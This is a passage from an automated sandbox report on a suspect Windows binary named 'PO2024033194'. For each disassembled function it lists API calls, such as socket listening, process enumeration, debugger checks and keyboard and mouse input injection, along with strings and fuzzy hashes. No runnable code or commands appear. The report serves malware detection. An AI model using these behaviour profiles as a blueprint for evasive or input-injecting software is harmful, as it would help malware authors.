                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                  • LockResource.KERNEL32(?), ref: 00433120
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                  • String ID:
                                                                  • API String ID: 1158019794-0
                                                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                  Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                  • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                  • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                  • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                  Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                  • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                  • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                  • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                  Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_strncmp
                                                                  • String ID: @oH$\$^$h
                                                                  • API String ID: 2175499884-3701065813
                                                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                  Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                  • String ID:
                                                                  • API String ID: 540024437-0
                                                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                  Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                  • API String ID: 0-2872873767
                                                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                  Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                  • __wsplitpath.LIBCMT ref: 00475644
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • _wcscat.LIBCMT ref: 00475657
                                                                  • __wcsicoll.LIBCMT ref: 0047567B
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID:
                                                                  • API String ID: 2547909840-0
                                                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                  Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                  • FindClose.KERNEL32(?), ref: 004525FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                  • String ID: *.*$\VH
                                                                  • API String ID: 2786137511-2657498754
                                                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                  Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID: pqI
                                                                  • API String ID: 2579439406-2459173057
                                                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                  Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __wcsicoll.LIBCMT ref: 00433349
                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                  • __wcsicoll.LIBCMT ref: 00433375
                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicollmouse_event
                                                                  • String ID: DOWN
                                                                  • API String ID: 1033544147-711622031
                                                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                  Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardMessagePostState$InputSend
                                                                  • String ID:
                                                                  • API String ID: 3031425849-0
                                                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                  Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 4170576061-0
                                                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                  Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                  • IsWindowVisible.USER32 ref: 0047A368
                                                                  • IsWindowEnabled.USER32 ref: 0047A378
                                                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                  • IsIconic.USER32 ref: 0047A393
                                                                  • IsZoomed.USER32 ref: 0047A3A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                  Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                  • CoUninitialize.OLE32 ref: 0047863C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 886957087-24824748
                                                                  • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
